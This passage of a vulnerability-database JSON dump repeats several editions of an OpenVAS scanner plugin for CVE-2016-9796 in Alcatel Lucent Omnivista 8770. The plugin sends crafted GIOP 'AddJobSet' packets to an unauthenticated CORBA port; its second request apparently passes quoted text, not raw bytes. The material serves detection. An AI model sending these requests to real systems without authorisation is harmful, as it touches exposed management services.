0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31, \n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d, \n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a, \n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41, \n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, \n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e, \n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64, \n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61, \n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e, \n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a, \n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62, \n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, \n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00, \n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, \n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! 
len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );\n", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)", "type": "openvas", "viewCount": 1}, "differentElements": ["description", "modified", "sourceData", "title"], "edition": 2, "lastseen": "2017-10-25T14:42:56"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-9796"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6bf069bbe6861620420160bbcd856ab58a35efac272af5ae4d486c517f603189", "hashmap": [{"hash": "fb634a5017b2a41a91c85626dded43f9", "key": "published"}, {"hash": "70cca94720f62109b82fe3d873b630b1", "key": "description"}, {"hash": "b50cff288596b473f692a61acc91c1d2", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "e92e9a00a213c6737b6176d2303efea7", "key": "sourceData"}, {"hash": "093f6fa86e4b143448c139412887dda8", "key": "cvelist"}, {"hash": "35b06cdf6e7f1387d88e10ea205c0816", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "18f7ae8aaceb897d726f1bf00abd32b1", "key": "pluginID"}, {"hash": "9b0c8a560ca98109588056dc2f5375b9", "key": "references"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "cc48873685a1db65f44dc4a65ac3d77f", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "id": "OPENVAS:1361412562310107112", "lastseen": 
"2018-10-02T14:29:26", "modified": "2018-10-01T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310107112", "published": "2016-12-23T00:00:00", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 11702 2018-10-01 07:31:38Z asteins $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 11702 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 09:31:38 +0200 (Mon, 01 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted giop packet request and check the response\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0\");\n\n script_tag(name:\"solution\", value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue,\n which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n script_tag(name:\"solution_type\", 
value:\"Workaround\");\n\n script_xref(name:\"URL\", value:\"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/40862/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif ( ! Ver = get_app_version( cpe:CPE, port: port)) exit( 0 );\nif ( Ver != \"8770\" ) exit ( 0 );\ngiopport = 30024;\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65,\n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74,\n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a,\n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,\n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00,\n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06,\n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10,\n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31,\n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d,\n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a,\n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41,\n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72,\n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e,\n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64,\n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61,\n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e,\n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a,\n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62,\n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,\n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00,\n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,\n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! 
len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );\n", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)", "type": "openvas", "viewCount": 5}, "differentElements": ["modified", "sourceData"], "edition": 6, "lastseen": "2018-10-02T14:29:26"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-9796"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to Remote Command Execution vulnerability.", "edition": 1, "enchantments": {}, "hash": "1d1bd78d2c3fe98fae61edc5ad00fc7286bc94045bad42e1c79ff9dfdb7694af", "hashmap": [{"hash": "fb634a5017b2a41a91c85626dded43f9", "key": "published"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "85c9f0711d4f065c7628d4fa6b5c296b", "key": "sourceData"}, {"hash": "093f6fa86e4b143448c139412887dda8", "key": "cvelist"}, {"hash": "bef5b94a942991fc8e55a261ea049521", "key": "modified"}, {"hash": "eecca42a8be8bed371b48a635243e1fc", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "18f7ae8aaceb897d726f1bf00abd32b1", "key": "pluginID"}, {"hash": "9b0c8a560ca98109588056dc2f5375b9", "key": "references"}, {"hash": "414ffb7a9ac291dfddc8cd6cac0b9b19", "key": "description"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "cc48873685a1db65f44dc4a65ac3d77f", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "id": "OPENVAS:1361412562310107112", "lastseen": "2017-07-02T21:13:10", "modified": 
"2017-03-20T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310107112", "published": "2016-12-23T00:00:00", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 5616 2017-03-20 13:32:41Z cfi $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 5616 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-20 14:32:41 +0100 (Mon, 20 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)\");\n\n script_tag(name: \"summary\" , value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to Remote Command Execution vulnerability.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted giop packet request and check the response\");\n\n script_tag(name: \"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0\");\n\n script_tag(name: \"solution\" , value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue, which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n 
script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name : \"URL\" , value : \"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name : \"URL\" , value : \"https://www.exploit-db.com/exploits/40862/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( host_runs(\"Windows\") == \"no\" ) exit( 0 );\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif ( ! Ver = get_app_version( cpe:CPE, port: port)) exit( 0 );\nif ( Ver != \"8770\" ) exit ( 0 );\ngiopport = 30024;\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\n## Construct AddjobSet packet\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65, \n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74, \n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a, \n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, \n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00, \n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06, \n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10, \n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31, \n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d, \n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a, \n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41, \n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, \n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e, \n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64, \n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61, \n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e, \n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a, \n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62, \n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, \n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00, \n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, \n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! 
len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );\n", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:13:10"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-9796"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "b77c1d12bf571b54366b42206ec6e6f42666b9360bfe1413004c848009df4acf", "hashmap": [{"hash": "fb634a5017b2a41a91c85626dded43f9", "key": "published"}, {"hash": "70cca94720f62109b82fe3d873b630b1", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3befccbd964ec41bf4da984f874d2bb5", "key": "sourceData"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "093f6fa86e4b143448c139412887dda8", "key": "cvelist"}, {"hash": "35b06cdf6e7f1387d88e10ea205c0816", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "18f7ae8aaceb897d726f1bf00abd32b1", "key": "pluginID"}, {"hash": "9b0c8a560ca98109588056dc2f5375b9", "key": "references"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "cc48873685a1db65f44dc4a65ac3d77f", "key": "href"}, {"hash": "1ebc96e5065a184c420d4bd937731299", "key": "modified"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "id": "OPENVAS:1361412562310107112", "lastseen": "2018-09-01T23:47:40", 
"modified": "2018-04-25T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310107112", "published": "2016-12-23T00:00:00", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 9603 2018-04-25 10:35:13Z asteins $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 9603 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-25 12:35:13 +0200 (Wed, 25 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted giop packet request and check the response\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0\");\n\n script_tag(name:\"solution\", value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue,\n which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n 
script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name:\"URL\", value:\"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/40862/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif ( ! Ver = get_app_version( cpe:CPE, port: port)) exit( 0 );\nif ( Ver != \"8770\" ) exit ( 0 );\ngiopport = 30024;\nif( ! get_port_state( giopport ) ) exit( 0 